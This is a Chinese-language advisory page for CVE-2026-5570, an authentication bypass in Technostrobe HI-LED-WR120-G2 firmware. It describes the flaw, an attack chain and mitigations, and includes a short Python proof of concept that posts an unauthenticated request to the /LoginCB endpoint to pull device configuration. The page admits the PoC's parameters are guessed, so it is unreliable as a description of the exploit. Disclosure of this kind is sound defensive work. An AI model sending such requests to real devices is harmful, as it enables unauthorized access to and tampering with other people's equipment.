CVE-2026-5570 CVSS 7.3 高危

CVE-2026-5570 Technostrobe HI-LED-WR120-G2 认证绕过漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5570

漏洞类型

认证绕过

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Technostrobe HI-LED-WR120-G2

漏洞概述

Technostrobe HI-LED-WR120-G2 设备在固件版本 5.5.0.1R6.03.30 中存在一处高危安全漏洞。该漏洞源于 /LoginCB 文件中的 index_config 函数未能正确实施身份验证机制，导致攻击者可以绕过正常的登录流程。由于漏洞利用无需用户交互且攻击复杂度低，远程攻击者可直接向受影响设备发送特制请求以触发漏洞。目前该漏洞的利用代码已被公开披露，且厂商尚未对此做出响应，这使得未修补的设备面临极高的被攻击风险，可能导致配置信息泄露或设备被非法控制。

技术细节

该漏洞的技术根源在于 Technostrobe HI-LED-WR120-G2 的 Web 服务器处理 /LoginCB 请求时的逻辑缺陷。具体来说，index_config 函数在处理配置索引请求时，未充分验证客户端的会话状态或认证令牌，直接执行了敏感操作。根据 CVSS 3.1 评分向量，该漏洞具有网络攻击向量（AV:N），攻击者无需具备目标系统的任何权限（PR:N）即可发起攻击。漏洞利用过程简单，仅需发送构造的 HTTP 请求即可绕过认证保护（UI:N）。成功利用后，攻击者可能获得低权限的读、写及执行能力（C:L/I:L/A:L），进而篡改设备配置或获取敏感信息。鉴于相关 PoC 代码已在 GitHub 等平台传播，该漏洞极易被自动化工具扫描利用。

攻击链分析

STEP 1

侦察

攻击者扫描互联网或内网，寻找暴露的 Technostrobe HI-LED-WR120-G2 设备。

STEP 2

漏洞利用

攻击者向目标设备的 /LoginCB 端点发送特制的 HTTP POST 请求，调用存在缺陷的 index_config 函数，不携带有效的认证凭证。

STEP 3

权限提升/数据窃取

由于缺乏身份验证，设备响应请求并返回配置信息或允许修改配置，导致机密性、完整性或可用性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-5570 Proof of Concept
# Target: Technostrobe HI-LED-WR120-G2
# Vulnerability: Improper authentication in /LoginCB -> index_config

target_url = "http://<TARGET_IP>/LoginCB" # Replace <TARGET_IP> with the device IP

# Payload targeting the vulnerable function
# The specific parameter structure may vary based on device implementation
payload = {
    "function": "index_config",
    "action": "get_config" 
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    # Sending request without authentication cookies
    response = requests.post(target_url, data=payload, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Potential Authentication Bypass Successful!")
        print("[+] Response Body:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30

防御指南

临时缓解措施

建议立即将设备置于防火墙后，禁止从互联网直接访问其 Web 管理接口。在官方发布修复补丁前，应关闭非必要的服务端口，并密切监控设备日志，一旦发现针对 /LoginCB 路径的未授权访问尝试，应及时阻断源 IP 地址。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表